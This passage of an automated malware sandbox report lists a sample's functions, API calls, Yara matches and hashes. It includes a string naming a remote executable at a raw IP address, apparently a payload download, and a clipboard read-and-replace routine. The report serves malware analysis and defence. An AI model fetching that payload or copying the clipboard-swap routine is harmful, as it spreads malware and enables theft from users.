                                                                                                                                                                                                                                                                                      control_flow_graph 489 40239e-4023ac 490 402561-402563 PostQuitMessage 489->490 491 4023b2-4023b7 489->491 492 402569-40256e 490->492 493 4023d0-4023d7 491->493 494 4023b9-4023cb DefWindowProcW 491->494 495 4023d9 call 401da4 493->495 496 4023de-4023e5 493->496 494->492 495->496 496->492 498 4023eb-40255f call 4010ba call 4029f4 496->498 498->492
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00402563
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessagePostProcQuitWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3873111417-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                                      • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E
                                                                                                                                                                                                                                                                                      Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101sleepCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 503 40155a-4016d0 Sleep call 4010ba 505 4016d5-4016d9 503->505
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                                                                                                                                                                                                                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$Sleep
                                                                                                                                                                                                                                                                                      • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                                                                      • API String ID: 3358372957-3120454669
                                                                                                                                                                                                                                                                                      • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                                                                      • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                                                                                                                                                                                                                                                      Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0040298F
                                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 0040299F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2843524283-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                                                                      • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                                                                                                                                                                                                                                                      Function 024C0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000400,?,?,024C0223,?,?), ref: 024C0E19
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,024C0223,?,?), ref: 024C0E1E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                      • Instruction ID: 19e3bb3d86d1ccb7e2d50aa8a73f4fa727658f1bcbf078656ba80fd3e822a18e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82D01235145128B7D7403A94DC09BDE7B1CDF05B66F108011FB0DD9180C770954046E5
                                                                                                                                                                                                                                                                                      Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                                                                      • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                                                                                                                                                                                                                                                      Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                                                                      • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                                                                                                                                                                                                                                                      Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 323602529-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                                                                      • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                                                                                                                                                                                                                                                      Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3886170330-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                                                                      • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                                                                                                                                                                                                                                                      Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                                                                      • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                                                                                                                                                                                                                                                      Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                                                                      • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                                                                                                                                                                                                                                                      Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                                                                      • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                                                                                                                                                                                                                                                      Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2005118841-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                                                                                                                                                                                                      • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                                                                                                                                                                                                                                                      Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                                                                      • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                                                                                                                                                                                                                      Function 00A39C9D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00A39CEE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3895623378.0000000000A39000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A39000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_a39000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                      • Instruction ID: 1ff3e6bcf305aaa8d1141798a0558458c5925ea02e8a08f27d35f67c1ece3be0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6110C79A00208EFDB01DF98CA85E99BBF5EF08751F158094F9489B362D771EA50DF90

                                                                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                                                                      Function 024C1942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 024C194D
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001541), ref: 024C1957
                                                                                                                                                                                                                                                                                        • Part of subcall function 024CCE77: _strlen.LIBCMT ref: 024CCE8E
                                                                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 024C1984
                                                                                                                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 024C1994
                                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 024C19B0
                                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 024C19DF
                                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 024C1B23
                                                                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 024C1B39
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000001), ref: 024C1B46
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 024C1B70
                                                                                                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 024C1B79
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 024C1B80
                                                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 024C1BA4
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000002D2), ref: 024C1BAF
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                                                                      • String ID: 4#E$i
                                                                                                                                                                                                                                                                                      • API String ID: 4246938166-2480119546
                                                                                                                                                                                                                                                                                      • Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                                                                                                                                                                                                      • Instruction ID: 057a5989c295d24765feb738bdd01b02e28d24272a35bf8867de8e1746211f39
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36510438C007949AE7119FA8ED457AD7774FF2A306F14522ED809A2173FB709681CB69
                                                                                                                                                                                                                                                                                      Function 024C2361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 024C239C
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 024C23B1
                                                                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 024C23B8
                                                                                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(00646464), ref: 024C23CB
                                                                                                                                                                                                                                                                                      • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024C23EA
                                                                                                                                                                                                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 024C240B
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 024C2416
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00000008,00000000), ref: 024C241F
                                                                                                                                                                                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 024C2443
                                                                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 024C24CE
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 024C24E6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1529870607-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                                                                                                                                                                                                      • Instruction ID: dc9abca1d7b682c903aabf14d796d7761c011211d69c65ca613a68487233c5da
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A71FF76900228AFDB62DF68DD85FAEB7BCEB09711F0041A9F509E6151DA70AF84CF10
                                                                                                                                                                                                                                                                                      Function 0043D678 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                                      • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                                                                      • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                                                                                                                                                                                                                                                      Function 024FB9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
